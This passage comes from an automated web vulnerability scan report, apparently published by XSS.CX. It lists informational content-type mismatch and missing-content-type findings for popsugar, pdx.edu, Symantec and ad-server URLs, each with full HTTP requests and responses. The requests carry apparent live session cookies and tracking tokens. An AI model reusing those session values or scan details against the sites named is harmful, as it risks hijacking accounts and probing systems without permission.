............ .h.......(....... ..... ..................................................j.D...l...>................................................j9..k.8...C.....m..j6..............................
...[SNIP]...
17.28. http://www.pdx.edu/sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pdx.edu
Path:   /sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff HTTP/1.1
Host: www.pdx.edu
Proxy-Connection: keep-alive
Referer: http://www.pdx.edu/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 04 Aug 2011 15:19:09 GMT
ETag: "2ea3e-70a8-4a9af809d3540"
Cache-Control: max-age=1209600
Expires: Thu, 22 Sep 2011 03:57:14 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 28840
Date: Mon, 12 Sep 2011 12:49:59 GMT
X-Varnish: 2032713838 2028186509
Age: 377565
Via: 1.1 varnish
Connection: keep-alive
X-backend: castor

wOFF......p........8........................FFTM..p.........SQM\GDEF..f....3...8.;..GPOS..h(...b....~...GSUB..g$.......d....OS/2.......Z...`.Lz.cmap...x...y......A:cvt .......$...$....fpgm...........e
...[SNIP]...
17.29. http://www.popsugar.com/ajaxharness  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /ajaxharness?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 213380
Date: Mon, 12 Sep 2011 12:47:57 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683; expires=Wed, 05-Oct-2011 16:21:17 GMT; path=/; httponly

{"replacements":{"sugar-menu-subnav-items":" \n \n \n\n\n\n\n<div id='sn-popsugar' class='site-dropdown popsugar-hp '>\n <div class='sn-col sn-col-1'>\n
...[SNIP]...
17.30. http://www.popsugar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025; ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Mon, 12 Sep 2011 12:47:59 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...
17.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Content-Type: text/plain; charset=UTF-8
X-Varnish: 312037258
Vary: Accept-Encoding
Content-Length: 1150
Cache-Control: max-age=3084
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...
18. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

18.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:29 GMT
Pragma: no-cache
Content-Length: 4383
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
18.2. http://ads.bluelithium.com/st  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:32 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
Report generated by XSS.CX at Mon Sep 12 12:10:13 GMT-06:00 2011.